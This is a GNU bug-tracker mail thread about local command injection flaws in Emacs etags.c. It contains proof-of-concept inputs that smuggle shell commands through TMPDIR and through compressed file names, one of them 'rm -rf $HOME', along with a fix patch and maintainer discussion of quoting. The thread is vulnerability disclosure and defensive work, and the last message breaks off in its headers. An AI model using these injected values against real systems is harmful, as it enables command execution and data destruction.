From debbugs-submit-bounces@debbugs.gnu.org Sun Dec 04 08:51:36 2022 Received: (at submit) by debbugs.gnu.org; 4 Dec 2022 13:51:36 +0000 Received: from localhost ([127.0.0.1]:57792 helo=debbugs.gnu.org) by debbugs.gnu.org with esmtp (Exim 4.84_2) (envelope-from ) id 1p1pP5-0008NX-QO for submit@debbugs.gnu.org; Sun, 04 Dec 2022 08:51:36 -0500 Received: from lists.gnu.org ([209.51.188.17]:38760) by debbugs.gnu.org with esmtp (Exim 4.84_2) (envelope-from ) id 1p1pOz-0008NP-Jl for submit@debbugs.gnu.org; Sun, 04 Dec 2022 08:51:34 -0500 Received: from eggs.gnu.org ([2001:470:142:3::10]) by lists.gnu.org with esmtps (TLS1.2:ECDHE_RSA_AES_256_GCM_SHA384:256) (Exim 4.90_1) (envelope-from ) id 1p1pOz-0002EL-Cr for bug-gnu-emacs@gnu.org; Sun, 04 Dec 2022 08:51:29 -0500 Received: from out162-62-57-210.mail.qq.com ([162.62.57.210]) by eggs.gnu.org with esmtps (TLS1.2:ECDHE_RSA_AES_256_GCM_SHA384:256) (Exim 4.90_1) (envelope-from ) id 1p1pOw-0006Sb-2M for bug-gnu-emacs@gnu.org; Sun, 04 Dec 2022 08:51:29 -0500 DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=qq.com; s=s201512; t=1670161877; bh=BsLGHQdBxKQHaOQNnaQn657Z05oea+dw25MGKeFD2I8=; h=Date:From:To:Subject; b=OARw1klic1uu7RovdL/3vVUVycF3rshkSMS8wzAYMbfYilivd0dlRG0LCQyAbznYe RLPxC2EuIZXBfzWv+KJbsTEsT5+brxEpGfrrizPZrOQXAeFPvXREpYCdK3TWEUdi4i g2vYJTGkoFAKvs3uXPq4fGOmmEQ0l0Mf83S+96MQ= Received: from lx-pc ([240e:399:e6f:ee32:f815:4044:ba50:97f9]) by newxmesmtplogicsvrszc2-0.qq.com (NewEsmtp) with SMTP id CCF3960E; Sun, 04 Dec 2022 21:51:15 +0800 X-QQ-mid: xmsmtpt1670161875t0wihs13i Message-ID: X-QQ-XMAILINFO: OKKHiI6c9SH3nVOafSLwHZ2zjVIrWeLpHJfpJf439X9761FCS94izUgUZgchHn ecGaNqxQBjpyDKdbY+sgq+ctTpZ3g2PekHUbi8DoyTvKZO/D+AHO3nZCrQpG6xRa+Ez1lqvfC2cr zg6Cj7A8gfOYL/optD4phZscweDP0C4fhCwe5vETGDznPbE63IsQtoeeJMy61YN31/gbK6+PcdKr c2ChHBWtTBnpQw4QeFmft0GSjfBZeeN+5DfsupfGAwU0sqH4JAfnWQ5vpTOWYgYhNvwTD9Fur0j6 gNtS1pKlIj7/Eex/TPn20ZWjmx2d8FjvnLO4NxLQzpOzEGtx4rMkNhTx8GhjGqN5qEyDQtFBWBte Q5Jx5fQNbD8RYlRLDNnpQV9y7PKl0QN9oO7gGkuDff0QdN6XXeRJ4rw2DDzN8oophmSun5edPC7E uaGguQxw6H8Lww35IOMfW+Z0DjWakSaZAi+Sqv8f3gp2yoX4gi46qy84cPk+1yfTVMm/wbWhuFQt a/Eqt3qEgdeZ2dZdu+9hgoIoYdlYg/oQYi3lxtHlFd7MhkkIyH7NWKxzAxboJ8Q24aEjWE4Rr9t1 g3/1DMKGJTeNuX0rycI6sebEO4Aypa2QLW/VKfty3leEaSUZ3Pp2nMIitn+t4wbhUKatdsA6Mm23 eAsi1rFWP6ToQbrbSGdZuqyBYOiEfpwQ9cJCblOqiGO0g1nPLTVSsztDeyUPudQGuXvDDwj9xD4Y Uj+YTaTgmIIzAh18LKY4xSRatabv5+nxbniGi1ZsAqfhLK6FQwlZcUnTlDYgbo2ZZHN3wqeMfm0B SZkC2oNjcYl2chcKoppyUwqJn3YppUocLwuVpv1K4C5W/2Ofm3XfsUVU8/l6chU2kD6HmjFa/RhF z2V8HYtcWMbFtS+xf06+m4Svug3/CNigxZRpUoOsc5rdL+G59kQVorkQ7cmOw/uKpq9KZBCnKFYv hEIa6IxbFydAy0X0DSrA== Date: Sun, 4 Dec 2022 21:51:13 +0800 From: lux To: bug-gnu-emacs@gnu.org Subject: [PATCH] Fix etags local command injection vulnerability X-OQ-MSGID: <20221204215113.6f003c5f@lx-pc> X-Mailer: Claws Mail 4.1.1 (GTK 3.24.35; x86_64-redhat-linux-gnu) MIME-Version: 1.0 Content-Type: multipart/mixed; boundary="MP_/nUhn8RG=Y4UPID575FtLTji" Received-SPF: none client-ip=162.62.57.210; envelope-from=lx@shellcodes.org; helo=out162-62-57-210.mail.qq.com X-Spam_score_int: 10 X-Spam_score: 1.0 X-Spam_bar: + X-Spam_report: (1.0 / 5.0 requ) BAYES_00=-1.9, DKIM_SIGNED=0.1, DKIM_VALID=-0.1, HELO_DYNAMIC_IPADDR=1.951, RCVD_IN_DNSWL_NONE=-0.0001, RCVD_IN_MSPIKE_H2=-0.001, RDNS_DYNAMIC=0.982, SPF_HELO_NONE=0.001, SPF_NONE=0.001 autolearn=no autolearn_force=no X-Spam_action: no action X-Spam-Score: -2.3 (--) X-Debbugs-Envelope-To: submit X-BeenThere: debbugs-submit@debbugs.gnu.org X-Mailman-Version: 2.1.18 Precedence: list List-Id: List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , Errors-To: debbugs-submit-bounces@debbugs.gnu.org Sender: "Debbugs-submit" X-Spam-Score: -3.3 (---) --MP_/nUhn8RG=Y4UPID575FtLTji Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Content-Disposition: inline Hi, this patch fix a new local command injection vulnerability in the etags.c. This vulnerability occurs in the following code: #if MSDOS || defined (DOS_NT) char *cmd1 = concat (compr->command, " \"", real_name); char *cmd = concat (cmd1, "\" > ", tmp_name); #else char *cmd1 = concat (compr->command, " '", real_name); char *cmd = concat (cmd1, "' > ", tmp_name); #endif free (cmd1); inf = (system (cmd) == -1 ? NULL : fopen (tmp_name, "r" FOPEN_BINARY)); free (cmd); } Vulnerability #1: for tmp_name variable, the value from the etags_mktmp() function, this function takes the value from the environment variable `TMPDIR`, `TEMP` or `TMP`, but without checking the value. So, if then hacker can control these environment variables, can execute the shell code. Attack example: $ ls etags.c $ zip etags.z etags.c adding: etags.c (deflated 72%) $ tmpdir="/tmp/;uname -a;/" $ mkdir $tmpdir $ TMPDIR=$tmpdir etags * sh: line 1: /tmp/: Is a directory Linux mypc 6.0.10-300.fc37.x86_64 #1 SMP PREEMPT_DYNAMIC Sat Nov 26 16:55:13 UTC 2022 x86_64 x86_64 x86_64 GNU/Linux sh: line 1: /etECggCJ: No such file or directory etags: skipping inclusion of TAGS in self. Vulnerability #2: If the target file is a compressed file, execute system commands (such as gzip, etc.), but do not check the file name. Attack example: $ ls etags.c $ zip "';uname -a;'test.z" etags.c <--- inject the shell code to filename adding: etags.c (deflated 72%) $ etags * gzip: .gz: No such file or directory Linux mypc 6.0.10-300.fc37.x86_64 #1 SMP PREEMPT_DYNAMIC Sat Nov 26 16:55:13 UTC 2022 x86_64 x86_64 x86_64 GNU/Linux sh: line 1: test.z: command not found I fix this vulnerability. By create a process, instead of call the sh or cmd.exe, and this patch work the Linux, BSD and Windows. --MP_/nUhn8RG=Y4UPID575FtLTji Content-Type: text/x-patch Content-Transfer-Encoding: 7bit Content-Disposition: attachment; filename=0001-Fix-etags-local-command-injection-vulnerability.patch >From 30cec9dcbd67998ce2360d191044e8d97992f794 Mon Sep 17 00:00:00 2001 From: lu4nx Date: Sun, 4 Dec 2022 21:18:29 +0800 Subject: [PATCH] Fix etags local command injection vulnerability * lib-src/etags.c: (decompress_file): New function --- lib-src/etags.c | 155 +++++++++++++++++++++++++++++++++++++----------- 1 file changed, 121 insertions(+), 34 deletions(-) diff --git a/lib-src/etags.c b/lib-src/etags.c index d1d20858cd..7c5faf8d6b 100644 --- a/lib-src/etags.c +++ b/lib-src/etags.c @@ -97,6 +97,7 @@ Copyright (C) 1984, 1987-1989, 1993-1995, 1998-2022 Free Software #ifdef WINDOWSNT # include +# include # undef HAVE_NTGUI # undef DOS_NT # define DOS_NT @@ -124,6 +125,7 @@ Copyright (C) 1984, 1987-1989, 1993-1995, 1998-2022 Free Software #include #include #include +#include /* Define CTAGS to make the program "ctags" compatible with the usual one. Leave it undefined to make the program "etags", which makes emacs-style @@ -255,7 +257,7 @@ #define xrnew(op, n, m) ((op) = xnrealloc (op, n, (m) * sizeof *(op))) typedef struct { const char *suffix; /* file name suffix for this compressor */ - const char *command; /* takes one arg and decompresses to stdout */ + const char *command; /* uncompress command */ } compressor; typedef struct @@ -391,6 +393,7 @@ #define xrnew(op, n, m) ((op) = xnrealloc (op, n, (m) * sizeof *(op))) static _Noreturn void pfatal (const char *); static void add_node (node *, node **); +static bool decompress_file (const char *, const char *, const char *); static void process_file_name (char *, language *); static void process_file (FILE *, char *, language *); static void find_entries (FILE *); @@ -527,16 +530,16 @@ #define STDIN 0x1001 /* returned by getopt_long on --parse-stdin */ }; static compressor compressors[] = -{ - { "z", "gzip -d -c"}, - { "Z", "gzip -d -c"}, - { "gz", "gzip -d -c"}, - { "GZ", "gzip -d -c"}, - { "bz2", "bzip2 -d -c" }, - { "xz", "xz -d -c" }, - { "zst", "zstd -d -c" }, - { NULL } -}; + { + { "z", "gzip" }, + { "Z", "gzip" }, + { "gz", "gzip" }, + { "GZ", "gzip" }, + { "bz2", "bzip2" }, + { "xz", "xz" }, + { "zst", "zstd" }, + { NULL } + }; /* * Language stuff. @@ -1621,7 +1624,6 @@ process_file_name (char *file, language *lang) compressor *compr; char *compressed_name, *uncompressed_name; char *ext, *real_name UNINIT, *tmp_name UNINIT; - int retval; canonicalize_filename (file); if (streq (file, tagfile) && !streq (tagfile, "-")) @@ -1712,37 +1714,29 @@ process_file_name (char *file, language *lang) inf = NULL; else { -#if MSDOS || defined (DOS_NT) - char *cmd1 = concat (compr->command, " \"", real_name); - char *cmd = concat (cmd1, "\" > ", tmp_name); -#else - char *cmd1 = concat (compr->command, " '", real_name); - char *cmd = concat (cmd1, "' > ", tmp_name); -#endif - free (cmd1); - inf = (system (cmd) == -1 - ? NULL - : fopen (tmp_name, "r" FOPEN_BINARY)); - free (cmd); - } - - if (!inf) - { - perror (real_name); - goto cleanup; + inf = (!decompress_file (compr->command, real_name, tmp_name) + ? NULL + : fopen (tmp_name, "r" FOPEN_BINARY)); + if (!inf) + { + perror (real_name); + goto cleanup; + } } } process_file (inf, uncompressed_name, lang); - retval = fclose (inf); + if (fclose (inf) < 0) + pfatal (file); + if (real_name == compressed_name) { - remove (tmp_name); + if (remove (tmp_name) == -1) + pfatal (tmp_name); + free (tmp_name); } - if (retval < 0) - pfatal (file); cleanup: if (compressed_name != file) @@ -1754,6 +1748,99 @@ process_file_name (char *file, language *lang) return; } +/* + * Specify a decompression command and write the decompression content to a new file. + * On success, true is returned. + */ +static bool +decompress_file (const char *command, const char *input_file, const char *output_file) +{ +#ifdef DOS_NT + SECURITY_ATTRIBUTES sa; + sa.nLength = sizeof (SECURITY_ATTRIBUTES); + sa.lpSecurityDescriptor = NULL; + sa.bInheritHandle = true; + + HANDLE hFile = CreateFile (output_file, GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_DELETE, &sa, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL); + + if (hFile == INVALID_HANDLE_VALUE) + { + perror (output_file); + return false; + } + + PROCESS_INFORMATION pi; + STARTUPINFO si; + ZeroMemory (&si, sizeof (si)); + ZeroMemory (&pi, sizeof (pi)); + si.cb = sizeof (STARTUPINFO); + si.dwFlags = STARTF_USESTDHANDLES; + si.hStdInput = NULL; + si.hStdOutput = hFile; + si.wShowWindow = SW_HIDE; + + char *cmd = concat (command, " -d -c ", input_file); + if (!CreateProcess (NULL, cmd, NULL, NULL, TRUE, CREATE_NO_WINDOW, NULL, NULL, &si, &pi)) + { + perror ("CreateProcess error"); + return false; + } + + WaitForSingleObject(pi.hProcess, INFINITE); + + CloseHandle (pi.hProcess); + CloseHandle (pi.hThread); + CloseHandle (hFile); + return true; +#else + int out_f; + if ((out_f = open (output_file, O_CREAT | O_WRONLY)) == -1) + { + perror (output_file); + return false; + } + + pid_t pid = fork (); + if (pid == -1) + { + perror ("fork"); + return false; + } + + if (pid == 0) + { + if (dup2 (out_f, STDOUT_FILENO) == -1) + { + perror ("dup2 stdout error"); + exit (EXIT_FAILURE); + } + + char *command_args[] = { (char *) command, (char *) "-d", (char *) "-c", (char *) input_file, NULL }; + if (execvp (command, command_args) == -1) + { + perror ("cannot execute the decompress command"); + exit (EXIT_FAILURE); + } + + exit (EXIT_SUCCESS); + } + + if (waitpid (pid, NULL, 0) == -1) + { + perror ("waitpid error"); + return false; + } + + if (close (out_f) == -1) + { + perror ("close error"); + return false; + } + + return true; +#endif +} + static void process_file (FILE *fh, char *fn, language *lang) { -- 2.38.1 --MP_/nUhn8RG=Y4UPID575FtLTji-- From debbugs-submit-bounces@debbugs.gnu.org Sun Dec 04 09:39:39 2022 Received: (at 59817) by debbugs.gnu.org; 4 Dec 2022 14:39:39 +0000 Received: from localhost ([127.0.0.1]:58052 helo=debbugs.gnu.org) by debbugs.gnu.org with esmtp (Exim 4.84_2) (envelope-from ) id 1p1q9a-0000QL-RM for submit@debbugs.gnu.org; Sun, 04 Dec 2022 09:39:39 -0500 Received: from eggs.gnu.org ([209.51.188.92]:48484) by debbugs.gnu.org with esmtp (Exim 4.84_2) (envelope-from ) id 1p1q9Z-0000QE-9O for 59817@debbugs.gnu.org; Sun, 04 Dec 2022 09:39:37 -0500 Received: from fencepost.gnu.org ([2001:470:142:3::e]) by eggs.gnu.org with esmtps (TLS1.2:ECDHE_RSA_AES_256_GCM_SHA384:256) (Exim 4.90_1) (envelope-from ) id 1p1q9S-00053Z-Vj; Sun, 04 Dec 2022 09:39:30 -0500 DKIM-Signature: v=1; a=rsa-sha256; q=dns/txt; c=relaxed/relaxed; d=gnu.org; s=fencepost-gnu-org; h=References:Subject:In-Reply-To:To:From:Date: mime-version; bh=LkaxDOR2sEP3yuMAEC0+1WXGDStWzsL0+fyDqeX1mUw=; b=W/xz8HVhSLIH eychm2G12qG3r5nTSp9B9VjSIWX5DwZarpFgbjs4rb2dzOTgw6k7b+bWTEc1lwvLIh8mD0lRlljga 2GA5DNaKteACd2S9aBsc6E6NIL3a5mHEc00GBhIdKyt3SnVAL7dM0wQb5Zr7GVlz698oQJ2kPd++F SYfl96nsYL6TEm9KeDm5l3LK7ObCumEX0hvX61eIJHc+oso8jMTIbK16w3vSuNdNQSx82XeVtg6J4 bzizfnGrc7IYaa1BvBlMls33eBuUQCG2zdKSwVsVZh0w1mH88k8oMZ7J91MmcjrCEbc/GlV7JygId zJv7IKBygBf+opvFyBKtDw==; Received: from [87.69.77.57] (helo=home-c4e4a596f7) by fencepost.gnu.org with esmtpsa (TLS1.2:ECDHE_RSA_AES_256_GCM_SHA384:256) (Exim 4.90_1) (envelope-from ) id 1p1q9S-0005th-8q; Sun, 04 Dec 2022 09:39:30 -0500 Date: Sun, 04 Dec 2022 16:39:10 +0200 Message-Id: <83r0xf9qsx.fsf@gnu.org> From: Eli Zaretskii To: lux In-Reply-To: (message from lux on Sun, 4 Dec 2022 21:51:13 +0800) Subject: Re: bug#59817: [PATCH] Fix etags local command injection vulnerability References: X-Spam-Score: -2.3 (--) X-Debbugs-Envelope-To: 59817 Cc: 59817@debbugs.gnu.org X-BeenThere: debbugs-submit@debbugs.gnu.org X-Mailman-Version: 2.1.18 Precedence: list List-Id: List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , Errors-To: debbugs-submit-bounces@debbugs.gnu.org Sender: "Debbugs-submit" X-Spam-Score: -3.3 (---) > Date: Sun, 4 Dec 2022 21:51:13 +0800 > From: lux > > Hi, this patch fix a new local command injection vulnerability in the > etags.c. > > This vulnerability occurs in the following code: > > #if MSDOS || defined (DOS_NT) > char *cmd1 = concat (compr->command, " \"", real_name); > char *cmd = concat (cmd1, "\" > ", tmp_name); > #else > char *cmd1 = concat (compr->command, " '", real_name); > char *cmd = concat (cmd1, "' > ", tmp_name); > #endif > free (cmd1); > inf = (system (cmd) == -1 > ? NULL > : fopen (tmp_name, "r" FOPEN_BINARY)); > free (cmd); > } > > Vulnerability #1: > > for tmp_name variable, the value from the etags_mktmp() function, this > function takes the value from the environment variable `TMPDIR`, `TEMP` > or `TMP`, but without checking the value. So, if then hacker can > control these environment variables, can execute the shell code. > > Attack example: > > $ ls > etags.c > $ zip etags.z etags.c > adding: etags.c (deflated 72%) > $ tmpdir="/tmp/;uname -a;/" > $ mkdir $tmpdir > $ TMPDIR=$tmpdir etags * > sh: line 1: /tmp/: Is a directory > Linux mypc 6.0.10-300.fc37.x86_64 #1 SMP PREEMPT_DYNAMIC Sat Nov 26 > 16:55:13 UTC 2022 x86_64 x86_64 x86_64 GNU/Linux sh: line 1: /etECggCJ: > No such file or directory etags: skipping inclusion of TAGS in self. > > Vulnerability #2: > > If the target file is a compressed file, execute system commands (such > as gzip, etc.), but do not check the file name. > > Attack example: > > $ ls > etags.c > $ zip "';uname -a;'test.z" etags.c <--- inject the shell code to > filename > adding: etags.c (deflated 72%) > $ etags * > gzip: .gz: No such file or directory > Linux mypc 6.0.10-300.fc37.x86_64 #1 SMP PREEMPT_DYNAMIC Sat Nov 26 > 16:55:13 UTC 2022 x86_64 x86_64 x86_64 GNU/Linux sh: line 1: test.z: > command not found > > I fix this vulnerability. By create a process, instead of call the > sh or cmd.exe, and this patch work the Linux, BSD and Windows. Thanks, but no, thanks. This cure is worse than the disease. Let's please find simpler, more robust solutions. It TMPDIR is a problem, let's use a file whose name is hard-coded in the etags.c source, or quote the name when we pass it to the shell. If we suspect someone could disguise shell commands as file names, let's quote the file names we pass to the shell with '...' to prevent that. Etc. etc. -- let's use simple solutions that don't drastically change the code. Please understand: etags is a stable program. I'm not interested in changes that modify its design or implementation in such drastic ways. From debbugs-submit-bounces@debbugs.gnu.org Sun Dec 04 11:27:17 2022 Received: (at 59817) by debbugs.gnu.org; 4 Dec 2022 16:27:17 +0000 Received: from localhost ([127.0.0.1]:58521 helo=debbugs.gnu.org) by debbugs.gnu.org with esmtp (Exim 4.84_2) (envelope-from ) id 1p1rpk-0001XY-PR for submit@debbugs.gnu.org; Sun, 04 Dec 2022 11:27:17 -0500 Received: from mail-oa1-f46.google.com ([209.85.160.46]:44770) by debbugs.gnu.org with esmtp (Exim 4.84_2) (envelope-from ) id 1p1rpj-0001XB-8g for 59817@debbugs.gnu.org; Sun, 04 Dec 2022 11:27:15 -0500 Received: by mail-oa1-f46.google.com with SMTP id 586e51a60fabf-1447c7aa004so2763343fac.11 for <59817@debbugs.gnu.org>; Sun, 04 Dec 2022 08:27:15 -0800 (PST) DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=gmail.com; s=20210112; h=cc:to:subject:message-id:date:mime-version:references:in-reply-to :from:from:to:cc:subject:date:message-id:reply-to; bh=avEisii5RqDZvDfXjCGc0TOOv8lsDFphVmNtzC5Z8zs=; b=TjqjlZsYZDSja3wGD9JGuWNKCWprgJM63kUVIPL9Wp3wMxfavxqYipbLRt0sNDxCLb knpq4EEv89cC0q8Y+bvSSjfeyslltRhX53oC0Ftuyt5qL9XUGjFxpv3ILhu/7YmAunwk vJEsAr39DTZzLBDVVLoFEkISI+5YOmh27Zq8gWSkhrDyiEir95wv5JdTJI6xLVFO5JYR SEQtbKFB/jbPKvvsdN6MLg4NRmA3SYaMtZbc5tbtN7lOnuj/rkU62nDq/j+hIomNuNnO OvsL6w1fWhffDA5d8W9gcpElhNnquVr76ArzDhoAVQWBvyQe4JMb/BZkdX8cYuwSr4UM 7/Zg== X-Google-DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=1e100.net; s=20210112; h=cc:to:subject:message-id:date:mime-version:references:in-reply-to :from:x-gm-message-state:from:to:cc:subject:date:message-id:reply-to; bh=avEisii5RqDZvDfXjCGc0TOOv8lsDFphVmNtzC5Z8zs=; b=X6LgZZaGp7el/7/GLVQ4VSyMAz6Au5ODUlTEgdyEYrJI9PZO3SgPhdmyaQCseE1Exf bmD1gENNy+5bmZG1pRYUCzsYpYH7u2uNuKEJ4G66SJDnT9MbWEk6hTEwMtWHmcoObMzX qazLIRNpJq9cumyoKmnnmAKnoL2rj72aX0tegO+GbI2N54oL41ajF7NkbQvqEcYVEPZD NJln4ztZW699FoGemxFCl3YZkoi3U8iXrqvlcsaiIunGIOeALHgHiSqvnVuHHH1031Xw Ac6pvo5BoAlvhFw8G6LndclyU7KHjhR0KXDr2mlg79lNfyfjz1ycdN9rhH/aJ6D7D8zO 9bwQ== X-Gm-Message-State: ANoB5pm3xU9IoVjv8ian0Kclzf+GAnxOLIBPI8bYcCVEOC+0S475NuTI RggPu4JB/20n2lG7To5TTrfVSNMU5jAwvccCSQg= X-Google-Smtp-Source: AA0mqf4+QQ/2Ay+yv5ThgcIlRbNXlYYwMPQyY6JiBVhZBOmUeMgvytGSic54YJlgPuazeB6AFezNzl0r7Rs753JYxtY= X-Received: by 2002:a05:6870:4995:b0:143:522a:ebcc with SMTP id ho21-20020a056870499500b00143522aebccmr27672395oab.199.1670171234998; Sun, 04 Dec 2022 08:27:14 -0800 (PST) Received: from 753933720722 named unknown by gmailapi.google.com with HTTPREST; Sun, 4 Dec 2022 08:27:14 -0800 From: Stefan Kangas In-Reply-To: <83r0xf9qsx.fsf@gnu.org> References: <83r0xf9qsx.fsf@gnu.org> X-Hashcash: 1:20:221204:59817@debbugs.gnu.org::S6u72kjL9feiXkw9:3ALg MIME-Version: 1.0 Date: Sun, 4 Dec 2022 08:27:14 -0800 Message-ID: Subject: Re: bug#59817: [PATCH] Fix etags local command injection vulnerability To: Eli Zaretskii , lux Content-Type: text/plain; charset="UTF-8" X-Spam-Score: -0.0 (/) X-Debbugs-Envelope-To: 59817 Cc: 59817@debbugs.gnu.org X-BeenThere: debbugs-submit@debbugs.gnu.org X-Mailman-Version: 2.1.18 Precedence: list List-Id: List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , Errors-To: debbugs-submit-bounces@debbugs.gnu.org Sender: "Debbugs-submit" X-Spam-Score: -1.0 (-) Eli Zaretskii writes: > Thanks, but no, thanks. This cure is worse than the disease. Let's please > find simpler, more robust solutions. It TMPDIR is a problem, let's use a > file whose name is hard-coded in the etags.c source, or quote the name when > we pass it to the shell. If we suspect someone could disguise shell > commands as file names, let's quote the file names we pass to the shell with > '...' to prevent that. Etc. etc. -- let's use simple solutions that don't > drastically change the code. With single quotes, every single quote character also needs to be quoted so you can't just use a file named "';rm -rf $HOME;'". So you need to substitute every single quote character with something like ' => '"'"' I'm not sure if tricks to escape it will remain, but "man sh" promises: Single Quotes Enclosing characters in single quotes preserves the literal meaning of all the characters (except single quotes, making it impossible to put single-quotes in a single-quoted string). The safest option is to just not call system, of course. From debbugs-submit-bounces@debbugs.gnu.org Sun Dec 04 12:04:44 2022 Received: (at 59817) by debbugs.gnu.org; 4 Dec 2022 17:04:44 +0000 Received: from localhost ([127.0.0.1]:58720 helo=debbugs.gnu.org) by debbugs.gnu.org with esmtp (Exim 4.84_2) (envelope-from ) id 1p1sQ0-0004IP-4k for submit@debbugs.gnu.org; Sun, 04 Dec 2022 12:04:44 -0500 Received: from eggs.gnu.org ([209.51.188.92]:40626) by debbugs.gnu.org with esmtp (Exim 4.84_2) (envelope-from ) id 1p1sPx-0004IJ-HS for 59817@debbugs.gnu.org; Sun, 04 Dec 2022 12:04:42 -0500 Received: from fencepost.gnu.org ([2001:470:142:3::e]) by eggs.gnu.org with esmtps (TLS1.2:ECDHE_RSA_AES_256_GCM_SHA384:256) (Exim 4.90_1) (envelope-from ) id 1p1sPr-0008PP-5Z; Sun, 04 Dec 2022 12:04:35 -0500 DKIM-Signature: v=1; a=rsa-sha256; q=dns/txt; c=relaxed/relaxed; d=gnu.org; s=fencepost-gnu-org; h=References:Subject:In-Reply-To:To:From:Date: mime-version; bh=VNnqGzNoLWM8/MmrdTBPocfjibw//vgGDOT5FedDJO8=; b=EcCaHMLNzjTR yLF11QCB7q/c9NbBnLuSBjgc/vBgwu7lZmJT1vzaj3CBHUq5v1Sp3hR/9mqgZdh+9muS2tassxuEF 7O75+guKZcDcMkyZVxKRNqcnyCGYxLmcfgKqeXS5HH/ThnJYZYzJKgesFth5n9n9SSXrtkWUA/aWG xKabEDwJEAhBdPz7ZQFgZmvmUml43A0FqWdnC40P6h3e0JQMKutDPRA4gGD9/deNYhB+c86enwg29 pEt+uWfoQv520FUuCpCPPYaYHq5/uMVDFPNPmNukXENu8nHeC90l6RRlQaCU4ualePVLtCwfhBeF9 Xqd9wDgEiFbkPH2GiLJUzw==; Received: from [87.69.77.57] (helo=home-c4e4a596f7) by fencepost.gnu.org with esmtpsa (TLS1.2:ECDHE_RSA_AES_256_GCM_SHA384:256) (Exim 4.90_1) (envelope-from ) id 1p1sPq-0005e4-Et; Sun, 04 Dec 2022 12:04:34 -0500 Date: Sun, 04 Dec 2022 19:04:15 +0200 Message-Id: <83lenn9k34.fsf@gnu.org> From: Eli Zaretskii To: Stefan Kangas In-Reply-To: (message from Stefan Kangas on Sun, 4 Dec 2022 08:27:14 -0800) Subject: Re: bug#59817: [PATCH] Fix etags local command injection vulnerability References: <83r0xf9qsx.fsf@gnu.org> X-Spam-Score: -2.3 (--) X-Debbugs-Envelope-To: 59817 Cc: lx@shellcodes.org, 59817@debbugs.gnu.org X-BeenThere: debbugs-submit@debbugs.gnu.org X-Mailman-Version: 2.1.18 Precedence: list List-Id: List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , Errors-To: debbugs-submit-bounces@debbugs.gnu.org Sender: "Debbugs-submit" X-Spam-Score: -3.3 (---) > From: Stefan Kangas > Date: Sun, 4 Dec 2022 08:27:14 -0800 > Cc: 59817@debbugs.gnu.org > > Eli Zaretskii writes: > > > Thanks, but no, thanks. This cure is worse than the disease. Let's please > > find simpler, more robust solutions. It TMPDIR is a problem, let's use a > > file whose name is hard-coded in the etags.c source, or quote the name when > > we pass it to the shell. If we suspect someone could disguise shell > > commands as file names, let's quote the file names we pass to the shell with > > '...' to prevent that. Etc. etc. -- let's use simple solutions that don't > > drastically change the code. > > With single quotes, every single quote character also needs to be quoted > so you can't just use a file named "';rm -rf $HOME;'". Yes. But still, doing so is hardly rocket science, and it leaves the general design of etags.c intact. > The safest option is to just not call system, of course. I'd rather not go there unless it was really necessary. From debbugs-submit-bounces@debbugs.gnu.org Sun Dec 04 19:58:27 2022 Received: (at 59817) by debbugs.gnu.org; 5 Dec 2022 00:58:27 +0000 Received: from localhost ([127.0.0.1]:60787 helo=debbugs.gnu.org) by debbugs.gnu.org with esmtp (Exim 4.84_2) (envelope-from ) id 1p1zoR-0005Ni-2D for submit@debbugs.gnu.org; Sun, 04 Dec 2022 19:58:27 -0500 Received: from out162-62-58-211.mail.qq.com ([162.62.58.211]:52811) by debbugs.gnu.org with esmtp (Exim 4.84_2) (envelope-from ) id 1p1zoN-0005Nc-FO for 59817@debbugs.gnu.org; Sun, 04 Dec 2022 19:58:25 -0500 DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=qq.com; s=s201512; t=1670201893; bh=hRUlPaoVfgQmh43ZcXq70ajlpFfGBTEikZ476nDautM=; h=From:To:Cc:Subject:Date; b=dd0dDURMHQz4OEZ/FfD/lkJXiJgLuroOVUzxvs/JZqmcGweegP88bqcrCrKEciW5r g3d8kcUmBQDKsCOf7eF/dH5eFNLGgyVvO0L6wPuKUAr5BZHm1c3CaYIBx/HspDbfwe Ic6avu4obwDGBaCskxCH/z2ftZ1BAOl3TTbddfXU= X-QQ-FEAT: oHWrrGTW1dAz+QFKvuUnj/W0ULeT1nZf X-QQ-SSF: 00000000000000F0000000000000 X-QQ-XMAILINFO: MvBKtgduchMIV9f6xNE8lulJlfqynqlGGCbbsrCReMo80c/tVxY+w4ZE2TKibz F7ODM8/q7tsjkuG4sOavfozzZEUiDX6hkv+iM9VRJV9rdZKJU0RFa2BEZ/2o84YY56KY6ky2TF7xH JgsVFPWO7E67zo9rT9wac9Ggls1y83BG8dJZaXoZixvy2yeiy350y7sKHmO85Bd9GN66rZHVFjR9/ Kp888ZjnKK0m4nJezgijPy+RXJOzglyKySOXSQf/1VssBrZNjc9jj1q/VTJdR1EPLKyIA/CrtPM0/ CIe9TAGbC+o6h5VitwTWhKASMgs1xJo1666BAVD2KT50hcfQIrwOJKwhLHT//YvtmXw4LxIRh2jvJ 5mdXx8SCP790KQtWunqIF8LMHaaUvvzddnktoLHA2/igM+7ki+uG8dcBOKmS8dsDVee7jDw1ppP/M VW6o0jzWITLPF34lc1dPsXleQqRMSjtVsAjLFjuY81puVAo8Ut6vxkvfzb7dcf/q1g/lSU1jYW2fj /rAUp1bqk93Mur+X+z9lvDKjBHzRnzP2wr3gzR5w14KIP5va1ieqJEKHwl4yntkKLLIIaPkHIDlfO b5FZSDTJiGXVgcS1v56vzDv534Jmc+3QFyTZ1LlX4RTdR93tGZrXL3xjPmFFlI22a+IB1E+yFmACc XPwhkoBbGQT+yg617n1nQlE6lF1P09ORrpVUOvL+syRs2iue1ETGaauQ6ztVGmpbD1k+ZKeku/dlH KsIoWitqXqG/eGRu9R1XATCvOnvHzxWYkFJyv47PBXH/e2BDiUC4NQQTCGnWt+XWJodg19f/8nHzS TRH+XBZ76ULCwBL2I5x19vhH7m3GXp2/9LIhLJwGsPiYofpBMsBFNT2ZR6XSga/77K+kLZU0ARMhN RkPCqwUfLYTsF/xm9KKHKiOlVKT/q2QH+lW5Jn5n1CksGsObfuSV2VwhElqCh+cvqYOhYMs5cRdoV 